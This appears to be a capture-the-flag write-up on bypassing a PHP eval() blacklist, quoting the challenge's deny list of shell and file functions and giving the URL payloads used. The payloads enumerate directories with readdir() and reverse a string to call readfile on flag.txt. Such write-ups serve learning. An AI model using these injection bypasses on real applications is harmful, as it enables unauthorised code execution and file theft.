http://challenges.ctfd.io:30068/index.php
Refer to source file (index.php):
$blocked = array("cat", "more" ,"readfile", "fopen", "file_get_contents", "file", "SplFileObject" );
$special_block= "nc";
$$special_block= "../flag.txt";
foreach ($blocked as $value) {
if (strpos($printValue, $value) || preg_match('/\bsystem|\bexec|\bbin2hex|\bassert|\bpassthru|\bshell_exec|\bescapeshellcmd| \bescapeshellarg|\bpcntl_exec|\busort|\bpopen|\bflag\.txt|\bspecial_block|\brequire|\bscandir|\binclude|\bhex2bin|\$[a-zA-Z]|[#!%^&*_+=\-,\.:`|<>?~\\\\]/i', $printValue)) {
$printValue="";
echo "<script>alert('Bad character/word ditected!');</script>";
break;
}
}
These are blocked words, We sould somehow bypass this black list.
As you can see, getcwd()
function is not blocked. So we can check the current directory path with it:
http://challenges.ctfd.io:30068/index.php?print=echo%20getcwd()
It says we're in /var/www/html
.
The blacklist contains ../flag.txt
so the flag might be in /var/www
.(?) We can get list of files using readdir()
:
http://challenges.ctfd.io:30068/index.php?print=echo%20readdir(opendir(%27/var/www%27))
The above input will give us the first file/dir inside /var/www
. let's try it with more readdir()
s:
http://challenges.ctfd.io:30068/index.php?print=echo%20readdir(opendir(%27/var/www%27));echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();
Wow! flag.txt
is just right there! How can we read it? all functions related to reading files are blocked (?)
A simple solution would be using strrev()
. as we saw in the source file, it uses eval()
function and it just evaluate a string as a php code. we should just generate a string that represents the code.
I'm gonna combine readfile()
and strrev()
to bypass the black list:
http://challenges.ctfd.io:30068/index.php?print=chdir(%22/var/www/%22);echo%20getcwd();echo%20readdir(opendir(%22/var/www/%22));echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20strrev(%22elifdaer%22)(readdir());&debug=on
Cool! :D